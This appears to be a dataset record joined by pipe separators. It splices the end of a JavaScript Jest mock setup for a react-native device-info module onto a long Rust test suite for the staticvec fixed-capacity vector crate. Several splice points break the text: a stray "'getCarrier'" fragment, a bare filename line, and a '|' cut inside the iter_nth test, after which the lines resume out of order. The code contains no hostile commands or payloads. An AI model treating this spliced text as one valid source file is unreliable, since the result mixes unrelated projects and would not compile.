'getSupportedAbis',
'getSupported32BitAbis',
'getSupported64BitAbis',
'getSystemAvailableFeatures',
];
for (const name of arrayFnNames) {
RNDeviceInfo[name] = arrayFnAsync();
RNDeviceInfo[`${name}Sync`] = arrayFnSync();
}
jest.mock('react-native', () => {
const RN = jest.requireActual('react-native'); // use original implementation, which comes with mocks out of the box
// mock modules/components created by assigning to NativeModules
RN.NativeModules.RNDeviceInfo = RNDeviceInfo;
type OS = typeof RN.Platform.OS;
jest.spyOn(RN.Platform, 'select').mockImplementation((obj: OS) => {
return obj.android || obj.ios || obj.default;
});
return RN;
});
jest.mock('./src/internal/nativeInterface', () => ({ default: RNDeviceInfo }));
jest.mock('react-native/Libraries/EventEmitter/NativeEventEmitter.js', () => {
const { EventEmitter } = require('events');
return EventEmitter;
}); | 'getCarrier', |
test_staticvec.rs | #![allow(clippy::all)]
#![allow(dead_code)]
#![allow(unused_imports)]
#![feature(box_syntax, const_fn, const_if_match, const_loop)]
// In case you're wondering, the instances of `#[cfg_attr(all(windows, miri), ignore)]` in this
// file above the `#[should_panic]` tests are there simply because Miri only supports catching
// panics on Unix-like OSes and ignores `#[should_panic]` everywhere else, so without the
// configuration attributes those tests just panic normally under Miri on Windows, which we don't
// want.
// Also, in case you're wondering why there's extensive use of "StaticVecs that contain boxed items"
// (something that would probably not be that common in the sense of normal use of this crate) in
// this file: it's done for the sake of wanting to be as "Miri detectable" as possible, by which I
// mean, "weird stuff done with heap memory" is significantly more likely to set Miri off than
// "weird stuff done with stack memory".
use staticvec::*;
use core::cell;
#[cfg(feature = "std")]
use std::panic::{self, AssertUnwindSafe};
#[cfg(feature = "std")]
use cool_asserts::assert_panics;
#[derive(Debug, Eq, PartialEq, Default)]
struct Counter(cell::Cell<u32>);
impl Counter {
fn increment(&self) {
self.0.set(self.0.get() + 1);
}
fn get(&self) -> u32 {
self.0.get()
}
}
// Helper struct for ensuring things are correctly dropped. Use the `instance`
// method to create a LifespanCountingInstance, then use the init_count
// method to see how many such instances were created (either by clone or by
// `instance`), and the drop_count method to see how many were dropped.
// TODO: create a more advanced version of this pattern that checks WHICH
// elements have been dropped; ie, to ensure that the elements at the end of
// an array are correctly dropped after a truncate
#[derive(Debug, Default)]
struct LifespanCounter {
// The number of times an instance was created
init_count: Counter,
// The number of times an instance was dropped
drop_count: Counter,
}
impl LifespanCounter {
fn instance(&self) -> LifespanCountingInstance {
self.init_count.increment();
LifespanCountingInstance { counter: self }
}
fn init_count(&self) -> u32 {
self.init_count.get()
}
fn drop_count(&self) -> u32 {
self.drop_count.get()
}
}
#[derive(Debug)]
struct LifespanCountingInstance<'a> {
counter: &'a LifespanCounter,
}
impl<'a> Clone for LifespanCountingInstance<'a> {
fn clone(&self) -> Self {
self.counter.instance()
}
// We deliberately do not provide a clone_from; we'd rather the default
// behavior (drop and replace with a fresh instance) is used, so we can
// accurately track clones.
}
impl<'a> Drop for LifespanCountingInstance<'a> {
fn drop(&mut self) {
self.counter.drop_count.increment()
}
}
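// A small illustrative sanity check (a sketch added here, not part of the
// original suite) showing how the lifespan-tracking helpers above are meant
// to be used: every instance created, directly or via `clone`, is dropped.
#[test]
fn lifespan_counter_sanity() {
  let tracker = LifespanCounter::default();
  {
    let first = tracker.instance();
    let _second = first.clone();
    assert_eq!(tracker.init_count(), 2);
    assert_eq!(tracker.drop_count(), 0);
  }
  // Both instances went out of scope at the end of the inner block.
  assert_eq!(tracker.init_count(), 2);
  assert_eq!(tracker.drop_count(), 2);
}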
#[derive(Debug, Eq, PartialEq)]
struct Struct {
s: &'static str,
}
impl Drop for Struct {
fn drop(&mut self) {
// This won't do anything observable in the test context, but it
// works as a placeholder.
println!("Dropping Struct with value: {}", self.s)
}
}
#[derive(Debug, Eq, PartialEq)]
struct ZST {}
impl Drop for ZST {
fn drop(&mut self) {
// This won't do anything observable in the test context, but it
// works as a placeholder.
println!("Dropping a ZST!")
}
}
#[test]
fn append() {
let mut a = staticvec![
box Struct { s: "A" },
box Struct { s: "B" },
box Struct { s: "C" }
];
let mut b = staticvec![
box Struct { s: "D" },
box Struct { s: "E" },
box Struct { s: "F" },
box Struct { s: "G" }
];
let mut c = StaticVec::<Box<Struct>, 6>::new();
c.append(&mut a);
c.append(&mut b);
assert_eq!(format!("{:?}", a), "[]");
assert_eq!(format!("{:?}", b), "[Struct { s: \"G\" }]");
assert_eq!(
c,
staticvec![
box Struct { s: "A" },
box Struct { s: "B" },
box Struct { s: "C" },
box Struct { s: "D" },
box Struct { s: "E" },
box Struct { s: "F" }
]
);
let mut d = staticvec![box 12, box 24];
let mut e = staticvec![box 1, box 2, box 3];
d.pop().unwrap();
d.append(&mut e);
assert_eq!(e, [box 2, box 3]);
assert_eq!(d, [box 12, box 1]);
let mut f = StaticVec::<Box<Struct>, 0>::new();
let mut g = staticvec![box Struct { s: "A" }, box Struct { s: "B" }];
f.append(&mut g);
assert_eq!(f, []);
assert_eq!(g, [box Struct { s: "A" }, box Struct { s: "B" }]);
}
#[test]
fn as_mut_ptr() {
let mut v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.as_mut_ptr(), 1) };
}
#[test]
fn as_mut_slice() {
let mut buffer = staticvec![1, 2, 3, 5, 8];
assert_eq!(buffer.as_mut_slice(), &mut [1, 2, 3, 5, 8]);
}
#[test]
fn as_ptr() {
let v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.as_ptr(), 1) };
}
#[test]
fn as_slice() {
let buffer = staticvec![1, 2, 3, 5, 8];
assert_eq!(buffer.as_slice(), &[1, 2, 3, 5, 8]);
}
#[cfg(feature = "std")]
#[test]
fn bounds_to_string() {
let mut v = staticvec![1, 2, 3, 4];
let it = v.iter();
assert_eq!(
"Current value of element at `start`: 1\nCurrent value of element at `end`: 4",
it.bounds_to_string()
);
let itm = v.iter_mut();
assert_eq!(
"Current value of element at `start`: 1\nCurrent value of element at `end`: 4",
itm.bounds_to_string()
);
let itv = v.into_iter();
assert_eq!(
"Current value of element at `start`: 1\nCurrent value of element at `end`: 4",
itv.bounds_to_string()
);
let mut v2 = StaticVec::<Box<i32>, 0>::new();
let it2 = v2.iter();
assert_eq!("Empty iterator!", it2.bounds_to_string());
let itm2 = v2.iter_mut();
assert_eq!("Empty iterator!", itm2.bounds_to_string());
let itv2 = v2.into_iter();
assert_eq!("Empty iterator!", itv2.bounds_to_string());
}
#[test]
fn capacity() {
let vec = StaticVec::<i32, 10>::new();
assert_eq!(vec.capacity(), 10);
}
#[test]
fn clear() {
let mut v = staticvec![1, 2, 3];
v.clear();
assert!(v.is_empty());
}
#[test]
fn clone() {
let v = staticvec![1, 2, 3, 4, 5, 6, 7, 8];
let vv = v.clone();
assert_eq!(v, vv);
}
#[test]
fn clone_from_shorter() {
let src: StaticVec<u32, 20> = (1..10).collect();
let mut dst: StaticVec<u32, 20> = (0..15).collect();
dst.clone_from(&src);
assert_eq!(dst, src);
}
#[test]
fn clone_from_longer() {
let src: StaticVec<u32, 20> = (0..15).collect();
let mut dst: StaticVec<u32, 20> = (1..10).collect();
dst.clone_from(&src);
assert_eq!(dst, src);
}
#[cfg_attr(all(windows, miri), ignore)]
#[cfg(feature = "std")]
#[test]
fn panicking_clone() {
// An earlier implementation of clone incorrectly leaked values in the event
// of a panicking clone. This test ensures that that does not happen.
// This struct will, if so configured, panic on a clone. It uses a
// LifespanCountingInstance to track instantiations and deletions, so that
// we can ensure that the correct number of drops occur.
#[derive(Debug)]
struct MaybePanicOnClone<'a> {
tracker: LifespanCountingInstance<'a>,
should_panic: bool,
}
impl<'a> MaybePanicOnClone<'a> {
fn new(counter: &'a LifespanCounter, should_panic: bool) -> Self {
Self {
tracker: counter.instance(),
should_panic,
}
}
}
impl<'a> Clone for MaybePanicOnClone<'a> {
fn clone(&self) -> Self {
if self.should_panic {
panic!("Clone correctly panicked during a test")
} else {
Self {
tracker: self.tracker.clone(),
should_panic: self.should_panic,
}
}
}
}
let lifespan_tracker = LifespanCounter::default();
let mut vec1: StaticVec<MaybePanicOnClone, 20> = StaticVec::new();
for _ in 0..5 {
vec1.push(MaybePanicOnClone::new(&lifespan_tracker, false));
}
vec1.push(MaybePanicOnClone::new(&lifespan_tracker, true));
// Sanity check: we've created 6 instances and dropped none of them
assert_eq!(lifespan_tracker.init_count(), 6);
assert_eq!(lifespan_tracker.drop_count(), 0);
// Attempt to clone the staticvec; this will panic. This should result in
// 5 successful clones, followed by a panic, followed by 5 drops during
// unwinding.
let result = panic::catch_unwind(AssertUnwindSafe(|| {
let vec2 = vec1.clone();
vec2
}));
// Ensure that a panic did occur
assert!(result.is_err());
// At this point, 5 instances should have been created and dropped in the
// aborted clone
assert_eq!(lifespan_tracker.init_count(), 11);
assert_eq!(lifespan_tracker.drop_count(), 5);
drop(vec1);
assert_eq!(lifespan_tracker.init_count(), 11);
assert_eq!(lifespan_tracker.drop_count(), 11);
}
/*
#[test]
fn concat() {
assert!(
staticvec!["A, B"].concat(&staticvec!["C", "D", "E", "F"]) == ["A, B", "C", "D", "E", "F"]
);
let v = StaticVec::<i32, 0>::from([]).concat(&StaticVec::<i32, 0>::from([]));
assert_eq!(v, []);
let v2 = staticvec![4, 5, 6].concat(&staticvec![1, 2, 3]);
assert_eq!(v2, [4, 5, 6, 1, 2, 3]);
}
#[test]
fn concat_clone() {
assert!(
staticvec![Box::new("A, B")].concat_clone(&staticvec![
Box::new("C"),
Box::new("D"),
Box::new("E"),
Box::new("F")
]) == [
Box::new("A, B"),
Box::new("C"),
Box::new("D"),
Box::new("E"),
Box::new("F")
]
);
let v = StaticVec::<i32, 0>::from([]).concat_clone(&StaticVec::<i32, 0>::from([]));
assert_eq!(v, []);
let v2 = staticvec![Box::new(4), Box::new(5), Box::new(6)].concat_clone(&staticvec![
Box::new(1),
Box::new(2),
Box::new(3)
]);
assert_eq!(
v2,
[
Box::new(4),
Box::new(5),
Box::new(6),
Box::new(1),
Box::new(2),
Box::new(3)
]
);
}
*/
#[test]
fn contains() {
assert_eq!(staticvec![1, 2, 3].contains(&2), true);
assert_eq!(staticvec![1, 2, 3].contains(&4), false);
}
#[test]
fn dedup() {
let mut vec = staticvec![1, 2, 2, 3, 2];
vec.dedup();
assert_eq!(vec, [1, 2, 3, 2]);
}
#[test]
fn dedup_by() {
let mut vec = staticvec!["foo", "bar", "Bar", "baz", "bar"];
vec.dedup_by(|a, b| a.eq_ignore_ascii_case(b));
assert_eq!(vec, ["foo", "bar", "baz", "bar"]);
}
#[test]
fn dedup_by_key() {
let mut vec = staticvec![10, 20, 21, 30, 20];
vec.dedup_by_key(|i| *i / 10);
assert_eq!(vec, [10, 20, 30, 20]);
}
#[test]
fn difference() {
assert_eq!(
staticvec![4, 5, 6, 7].difference(&staticvec![1, 2, 3, 7]),
[4, 5, 6]
);
assert_eq!(staticvec![1, 2, 3].difference(&staticvec![3, 4, 5]), [1, 2]);
}
#[test]
fn drain() {
let mut v = staticvec![1, 2, 3];
let u = v.drain(1..);
assert_eq!(v, &[1]);
assert_eq!(u, &[2, 3]);
v.drain(..);
assert_eq!(v, &[]);
let mut v = StaticVec::from([0; 8]);
v.pop();
v.drain(0..7);
assert_eq!(&v[..], &[]);
v.extend(0..);
v.drain(1..4);
assert_eq!(&v[..], &[0, 4, 5, 6, 7]);
let u: StaticVec<u8, 3> = v.drain(1..4).iter().rev().collect();
assert_eq!(&u[..], &[6, 5, 4]);
assert_eq!(&v[..], &[0, 7]);
v.drain(..);
assert_eq!(&v[..], &[]);
let mut v2 = StaticVec::from([0; 8]);
v2.drain(0..=7);
assert_eq!(&v2[..], &[]);
v2.extend(0..);
v2.drain(1..=4);
assert_eq!(&v2[..], &[0, 5, 6, 7]);
let u: StaticVec<u8, 3> = v2.drain(1..=2).iter().rev().collect();
assert_eq!(&u[..], &[6, 5]);
assert_eq!(&v2[..], &[0, 7]);
v2.drain(..);
assert_eq!(&v2[..], &[]);
let mut v3 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v3.pop();
v3.drain(0..7);
assert_eq!(&v3[..], &[]);
let mut v4 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v4.drain(0..4);
assert_eq!(
&v4[..],
&[Box::new(12), Box::new(12), Box::new(12), Box::new(12)]
);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn drain_panic() {
let mut v3 = StaticVec::from([0; 0]);
v3.drain(0..=0);
}
#[test]
fn drain_iter() {
let mut v = staticvec![1, 2, 3];
let u: StaticVec<i32, 6> = v.drain_iter(1..).collect();
assert_eq!(v, &[1]);
assert_eq!(u, &[2, 3]);
v.drain_iter(..);
assert_eq!(v, &[]);
let mut v = StaticVec::from([0; 8]);
v.pop();
v.drain_iter(0..7);
assert_eq!(&v[..], &[]);
v.extend(0..);
v.drain_iter(1..4);
assert_eq!(&v[..], &[0, 4, 5, 6, 7]);
let u: StaticVec<_, 3> = v.drain_iter(1..4).rev().collect();
assert_eq!(&u[..], &[6, 5, 4]);
assert_eq!(&v[..], &[0, 7]);
v.drain_iter(..);
assert_eq!(&v[..], &[]);
let mut v2 = StaticVec::from([0; 8]);
v2.drain_iter(0..=7);
assert_eq!(&v2[..], &[]);
v2.extend(0..);
v2.drain_iter(1..=4);
assert_eq!(&v2[..], &[0, 5, 6, 7]);
let u: StaticVec<_, 3> = v2.drain_iter(1..=2).rev().collect();
assert_eq!(&u[..], &[6, 5]);
assert_eq!(&v2[..], &[0, 7]);
v2.drain_iter(..);
assert_eq!(&v2[..], &[]);
let mut v3 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v3.pop();
v3.drain_iter(0..7);
assert_eq!(&v3[..], &[]);
let mut v4 = staticvec![
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12),
Box::new(12)
];
v4.drain_iter(0..4);
assert_eq!(
&v4[..],
&[Box::new(12), Box::new(12), Box::new(12), Box::new(12)]
);
let mut v5 = staticvec![
ZST {},
ZST {},
ZST {},
ZST {},
ZST {},
ZST {},
ZST {},
ZST {}
];
v5.drain_iter(0..4);
assert_eq!(&v5[..], &[ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn drain_iter_panic() {
let mut v3 = StaticVec::from([0; 0]);
v3.drain_iter(0..=0);
}
#[test]
fn drain_filter() {
let mut numbers = staticvec![1, 2, 3, 4, 5, 6, 8, 9, 11, 13, 14, 15];
let evens = numbers.drain_filter(|x| *x % 2 == 0);
let odds = numbers;
assert_eq!(evens, [2, 4, 6, 8, 14]);
assert_eq!(odds, [1, 3, 5, 9, 11, 13, 15]);
let mut empty: StaticVec<i32, 12> = StaticVec::from([]);
assert_eq!(empty.drain_filter(|x| *x == 0), []);
let mut structs: StaticVec<Box<Struct>, 4> = staticvec![
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "D" })
];
assert_eq!(
structs.drain_filter(|s| s.s > "B"),
[Box::new(Struct { s: "C" }), Box::new(Struct { s: "D" })]
);
}
#[test]
fn extend() {
let mut c = StaticVec::<i32, 6>::new();
c.push(5);
c.push(6);
c.push(7);
c.extend(staticvec![1, 2, 3].iter());
assert_eq!("[5, 6, 7, 1, 2, 3]", format!("{:?}", c));
c.clear();
assert_eq!(c.len(), 0);
c.extend([1].iter());
assert_eq!(c.len(), 1);
c.extend(staticvec![1, 2, 3, 4, 5, 6, 7].into_iter());
assert_eq!(c.len(), 6);
c.clear();
c.extend(staticvec![1, 2, 3, 4, 5, 6, 7]);
assert_eq!(c.len(), 6);
let c2 = staticvec![vec![1, 1], vec![1, 2], vec![1, 3], vec![1, 4]];
let mut c3 = StaticVec::<Vec<u8>, 2>::new();
c3.extend(c2);
assert_eq!(c3, [vec![1, 1], vec![1, 2]]);
let c4 = staticvec![vec![1, 1], vec![1, 2], vec![1, 3], vec![1, 4]];
let mut c5 = StaticVec::<Vec<u8>, 4>::new();
c5.extend(c4);
assert_eq!(c5, [vec![1, 1], vec![1, 2], vec![1, 3], vec![1, 4]]);
let c6 = staticvec![
vec![vec![1, 1]],
vec![vec![1, 2]],
vec![vec![1, 3]],
vec![vec![1, 4]],
vec![vec![1, 5]],
vec![vec![1, 6]]
];
let mut c7 = StaticVec::<Vec<Vec<u8>>, 3>::new();
c7.extend(c6);
assert_eq!(c7, [vec![vec![1, 1]], vec![vec![1, 2]], vec![vec![1, 3]]]);
}
#[test]
fn extend_from_slice() {
let mut vec = StaticVec::<i32, 4>::new_from_slice(&[1]);
vec.extend_from_slice(&[2, 3, 4]);
assert_eq!(vec, [1, 2, 3, 4]);
}
#[test]
fn filled_with() {
let mut i = 0;
let v = StaticVec::<i32, 64>::filled_with(|| {
i += 1;
i
});
assert_eq!(v.len(), 64);
assert_eq!(v[0], 1);
assert_eq!(v[1], 2);
assert_eq!(v[2], 3);
assert_eq!(v[3], 4);
}
#[test]
fn filled_with_by_index() {
let v = StaticVec::<usize, 64>::filled_with_by_index(|i| i + 1);
assert_eq!(v.len(), 64);
assert_eq!(v[0], 1);
assert_eq!(v[1], 2);
assert_eq!(v[2], 3);
assert_eq!(v[3], 4);
}
#[test]
fn first() {
let v = staticvec![1, 2, 3];
assert_eq!(*v.first().unwrap(), 1);
}
#[test]
fn first_mut() {
let mut v = staticvec![1, 2, 3];
assert_eq!(*v.first_mut().unwrap(), 1);
}
#[test]
fn from() {
assert_eq!(
"[5, 6, 7, 1, 2, 3]",
format!("{:?}", StaticVec::<i32, 6>::from(&[5, 6, 7, 1, 2, 3]))
);
assert_eq!(
"[1, 1, 1, 1, 1, 1]",
format!("{:?}", StaticVec::<i32, 6>::from([1; 6]))
);
let mut v = staticvec![1];
v.clear();
assert_eq!(StaticVec::<i32, 6>::from(v.as_slice()).len(), 0);
assert_eq!(StaticVec::from(["A"]), ["A"]);
assert_eq!(
StaticVec::from([Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]),
[Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]
);
}
#[test]
fn from_iter() {
assert_eq!(
StaticVec::<u8, 12>::from_iter(&[1, 2, 3, 4, 5, 6]),
[1, 2, 3, 4, 5, 6]
);
assert_eq!(
StaticVec::<u8, 12>::from_iter([1, 2, 3, 4, 5, 6].iter()),
[1, 2, 3, 4, 5, 6]
);
assert_eq!(
StaticVec::<u8, 12>::from_iter(staticvec![1, 2, 3, 4, 5, 6].iter()),
[1, 2, 3, 4, 5, 6]
);
assert_eq!(StaticVec::<u8, 0>::from_iter(&[1, 2, 3, 4, 5, 6]), []);
assert_eq!(
StaticVec::<Box<Struct>, 2>::from_iter(
staticvec![Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })].into_iter()
),
[Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]
);
assert_eq!(
StaticVec::<Box<Struct>, 2>::from_iter(staticvec![
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "C" })
]),
[Box::new(Struct { s: "A" }), Box::new(Struct { s: "B" })]
);
assert_eq!(
StaticVec::<Box<Struct>, 4>::from_iter(staticvec![
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "C" })
]),
[
Box::new(Struct { s: "A" }),
Box::new(Struct { s: "B" }),
Box::new(Struct { s: "C" }),
Box::new(Struct { s: "C" })
]
);
}
#[cfg(feature = "std")]
#[test]
fn from_vec() {
let v = vec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" }),
];
let vv = StaticVec::<Box<Struct>, 2>::from_vec(v);
assert_eq!(vv.capacity(), 2);
assert_eq!(vv.len(), 2);
assert_eq!(
vv,
[Box::new(Struct { s: "AAA" }), Box::new(Struct { s: "BBB" })]
);
let x = Vec::<Box<Struct>>::new();
let y = StaticVec::<Box<Struct>, 1>::from_vec(x);
assert_eq!(y, []);
}
#[test]
fn get_unchecked() {
let v = staticvec!["a", "b", "c"];
assert_eq!(unsafe { *v.get_unchecked(1) }, "b");
}
#[test]
fn get_unchecked_mut() {
let mut v = staticvec!["a", "b", "c"];
assert_eq!(unsafe { *v.get_unchecked_mut(1) }, "b");
}
#[test]
fn index() {
let vec = staticvec![0, 1, 2, 3, 4];
assert_eq!(vec[3], 3);
assert_eq!(vec[1..4], [1, 2, 3]);
assert_eq!(vec[1..=1], [1]);
assert_eq!(vec[1..3], [1, 2]);
assert_eq!(vec[..3], [0, 1, 2]);
assert_eq!(vec[..=3], [0, 1, 2, 3]);
assert_eq!(vec[1..], [1, 2, 3, 4]);
assert_eq!(vec[1..=3], [1, 2, 3]);
assert_eq!(vec[..], [0, 1, 2, 3, 4]);
}
#[cfg(not(miri))]
#[test]
#[cfg(feature = "std")]
fn index_panics() {
let vec = staticvec![0, 1, 2, 3, 4];
// Miri can't run this one because the `assert_panics` macro allows *all* of these
// expected panics to occur one after another, while Miri can only catch one panic at
// a time (and specifically only in `should_panic` tests).
assert_panics!(vec[10]);
assert_panics!(&vec[..10]);
assert_panics!(&vec[10..]);
assert_panics!(&vec[10..15]);
assert_panics!(&vec[1..0]);
}
#[test]
fn insert() {
let mut vec = StaticVec::<i32, 5>::new_from_slice(&[1, 2, 3]);
vec.insert(1, 4);
assert_eq!(vec, [1, 4, 2, 3]);
vec.insert(4, 5);
assert_eq!(vec, [1, 4, 2, 3, 5]);
}
// The next couple of tests for `insert_many` are adapted from the SmallVec testsuite.
#[test]
fn insert_many() {
let mut v: StaticVec<u8, 8> = StaticVec::new();
for x in 0..4 {
v.push(x);
}
assert_eq!(v.len(), 4);
v.insert_many(1, [5, 6].iter().cloned());
assert_eq!(
&v.iter().map(|v| *v).collect::<StaticVec<_, 8>>(),
&[0, 5, 6, 1, 2, 3]
);
v.clear();
for x in 0..4 {
v.push(x);
}
assert_eq!(v.len(), 4);
v.insert_many(1, [5, 6].iter().cloned());
assert_eq!(
&v.iter().map(|v| *v).collect::<StaticVec<_, 8>>(),
&[0, 5, 6, 1, 2, 3]
);
v.clear();
for i in 0..6 {
v.push(i + 1);
}
v.insert_many(6, [1].iter().cloned());
assert_eq!(
&v.iter().map(|v| *v).collect::<StaticVec<_, 8>>(),
&[1, 2, 3, 4, 5, 6, 1]
);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic(expected = "Insufficient remaining capacity / out of bounds!")]
fn insert_many_panic() {
let mut v: StaticVec<u8, 8> = StaticVec::new();
for i in 0..7 {
v.push(i + 1);
}
v.insert_many(0, [1, 2, 3, 4].iter().cloned());
let mut v2: StaticVec<u8, 0> = StaticVec::new();
v2.insert_many(27, [1, 2, 3, 4].iter().cloned());
}
#[test]
fn intersection() {
assert_eq!(
staticvec![4, 5, 6, 7].intersection(&staticvec![1, 2, 3, 7, 4]),
[4, 7],
);
}
/*
#[test]
fn intersperse() {
assert_eq!(
staticvec!["A", "B", "C", "D"].intersperse("Z"),
["A", "Z", "B", "Z", "C", "Z", "D"]
);
assert_eq!(staticvec![""].intersperse("B"), [""]);
assert_eq!(staticvec!["A"].intersperse("B"), ["A"]);
let mut x = staticvec!["A"];
x.clear();
assert_eq!(x.intersperse("B"), StaticVec::<&str, 0>::new());
}
#[test]
fn intersperse_clone() {
assert_eq!(
staticvec!["A", "B", "C", "D"].intersperse_clone("Z"),
["A", "Z", "B", "Z", "C", "Z", "D"]
);
assert_eq!(staticvec![""].intersperse_clone("B"), [""]);
assert_eq!(staticvec!["A"].intersperse_clone("B"), ["A"]);
let mut x = staticvec!["A"];
x.clear();
assert_eq!(x.intersperse_clone("B"), StaticVec::<&str, 0>::new());
}
*/
#[test]
fn is_empty() {
let mut v = StaticVec::<i32, 1>::new();
assert!(v.is_empty());
v.push(1);
assert!(!v.is_empty());
}
#[test]
fn is_not_empty() {
let mut v = StaticVec::<i32, 1>::new();
assert!(v.is_empty());
v.push(1);
assert!(v.is_not_empty());
}
#[test]
fn is_full() {
let mut v = StaticVec::<i32, 1>::new();
v.push(1);
assert!(v.is_full());
}
#[test]
fn is_not_full() {
let v = StaticVec::<i32, 1>::new();
assert!(v.is_not_full());
}
#[test]
fn iter() {
let v = staticvec![1, 2, 3, 4, 5];
let mut i = v.iter();
assert_eq!(*i.next().unwrap(), 1);
assert_eq!(*i.next_back().unwrap(), 5);
assert_eq!("StaticVecIterConst([2, 3, 4])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 2);
assert_eq!(*i.next_back().unwrap(), 4);
assert_eq!("StaticVecIterConst([3])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 3);
assert_eq!("StaticVecIterConst([])", format!("{:?}", i));
let v2 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let it2 = v2.iter();
assert_eq!(it2.as_slice(), &[ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[test]
fn iter_nth() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter();
assert_eq!(i3.nth(2).unwrap(), &ZST {});
assert_eq!(i3.as_slice(), &[ZST {}]);
assert_eq!(i3.nth(0).unwrap(), &ZST {});
assert_eq!(i3.nth(0), None);
assert_eq!(i3.nth(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter();
assert_eq!(i4.nth(2).unwrap(), &3);
assert_eq!(i4.as_slice(), &[4]); | let xs = staticvec![0, 1, 2, 3, 4, 5];
for (i, &x) in xs.iter().enumerate() {
assert_eq!(i, x);
}
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth(0) {
assert_eq!(i, x);
}
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth(1) {
assert_eq!(i, x);
}
let (i, &x) = xs.iter().enumerate().nth(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 3);
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter();
assert_eq!(it5.nth(2).unwrap(), &vec![3]);
assert_eq!(it5.as_slice(), &[vec![4], vec![5]]);
assert_eq!(it5.next().unwrap(), &vec![4]);
assert_eq!(it5.next_back().unwrap(), &vec![5]);
assert_eq!(it5.nth(0), None);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter();
let o = it6.nth(2);
assert_eq!(format!("{:?}", o), "Some([3, 3])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterConst([[4, 4], [5, 5], [6, 6]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter();
let o = it7.nth(5);
assert_eq!(format!("{:?}", o), "Some([6, 6])");
assert_eq!(format!("{:?}", it7), "StaticVecIterConst([])");
}
#[test]
fn iter_nth_back() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter();
assert_eq!(i3.nth_back(2).unwrap(), &ZST {});
assert_eq!(i3.as_slice(), &[ZST {}]);
assert_eq!(i3.nth_back(0).unwrap(), &ZST {});
assert_eq!(i3.nth_back(0), None);
assert_eq!(i3.nth_back(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter();
assert_eq!(i4.nth_back(2).unwrap(), &2);
assert_eq!(i4.as_slice(), &[1]);
assert_eq!(i4.nth_back(0).unwrap(), &1);
assert_eq!(i4.nth_back(0), None);
assert_eq!(i4.nth_back(0), None);
let xs = staticvec![0, 1, 2, 3, 4, 5];
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth_back(0) {
assert_eq!(i, x);
}
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth_back(1) {
assert_eq!(i, x);
}
let (i, &x) = xs.iter().enumerate().nth_back(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 2);
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter();
assert_eq!(it5.nth_back(1).unwrap(), &vec![4]);
assert_eq!(it5.as_slice(), &[vec![1], vec![2], vec![3]]);
assert_eq!(it5.next().unwrap(), &vec![1]);
assert_eq!(it5.next_back().unwrap(), &vec![3]);
assert_eq!(it5.nth_back(0).unwrap(), &vec![2]);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter();
let o = it6.nth_back(2);
assert_eq!(format!("{:?}", o), "Some([4, 4])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterConst([[1, 1], [2, 2], [3, 3]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter();
let o = it7.nth_back(5);
assert_eq!(format!("{:?}", o), "Some([1, 1])");
assert_eq!(format!("{:?}", it7), "StaticVecIterConst([])");
}
#[test]
fn iter_nth2() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().nth(i).unwrap(), &v[i]);
}
assert_eq!(v.iter().nth(v.len()), None);
}
#[test]
fn iter_nth_back2() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().nth_back(i).unwrap(), &v[v.len() - 1 - i]);
}
